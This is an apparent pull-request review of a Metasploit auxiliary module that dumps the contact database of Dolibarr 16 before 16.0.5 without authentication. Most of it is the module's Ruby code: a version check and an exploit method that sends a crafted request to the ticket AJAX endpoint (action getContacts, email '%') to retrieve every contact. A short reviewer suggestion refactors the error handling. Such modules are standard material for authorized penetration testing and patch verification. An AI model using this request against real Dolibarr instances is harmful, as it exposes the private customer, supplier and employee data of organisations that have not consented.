modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb

```diff
@@ -0,0 +1,140 @@
+  include Msf::Auxiliary::Report
+  include Msf::Module::Failure
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Dolibarr 16 pre-auth contact database dump',
+        'Description' => %q{
+          Dolibarr version 16 < 16.0.5 is vulnerable to a pre-authentication contact database dump.
+          An unauthenticated attacker may retreive a company’s entire customer file, prospects, suppliers,
+          and potentially employee information if a contact file exists.
+          Both public and private notes are also included in the dump.
+        },
+        'Author' => [
+          'Vladimir TOUTAIN', 'Nolan LOSSIGNOL-DRILLIEN'
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2023-03-14',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'References' => [
+          ['URL', 'https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/blob/16.0.5/ChangeLog#L34'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e']
+        ]
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Path to Dolibarr instance', '/'])
+
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return Exploit::CheckCode::Unknown('Connection failed') unless res
+    return Exploit::CheckCode::Safe unless res.code == 200
+
+    version = res.body.scan(/Dolibarr ([\d.]+-*[a-zA-Z]*)/).flatten.first
+
+    if Rex::Version.new(version).between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.0.4'))
+      print_good("Detected vulnerable Dolibarr version: #{version}")
+      return Exploit::CheckCode::Appears
+    elsif version.blank?
+      print_warning('Dolibarr version not found - proceeding anyway...')
+      return Exploit::CheckCode::Detected
+    else
+      print_warning("Detected apparently non-vulnerable Dolibarr version: #{version} - proceeding anyway...")
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+  def exploit(ip)
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/public/ticket/ajax/ajax.php'),
+      'vars_get' => {
+        'action' => 'getContacts',
+        'email' => '%'
+      }
+    }, 90, true)
+
+    res_json_document = res.get_json_document['contacts']
+
+    if res && res.code != 200
+      fail_with(Failure::UnexpectedReply, "Exploit response code: #{res.code}")
+    elsif res_json_document.nil?
+      fail_with(Failure::UnexpectedReply, 'Dolibarr database empty')
+    end
```

Comment:
```suggestion
    res_json_document = res.get_json_document

    if res && res.code != 200
      fail_with(Failure::UnexpectedReply, "Exploit response code: #{res.code}")
    elsif res_json_document.nil?
      fail_with(Failure::UnexpectedReply, 'Dolibarr database empty')
    end
    
    contacts = res_json_document['contacts']
    fail_with(Failure::UnexpectedReply, 'Dolibarr data did not include contacts field') if contacts.blank?
    
    ...
```

If you tack that suggestion, you'll need to refactor references of `res_json_document` to `contacts.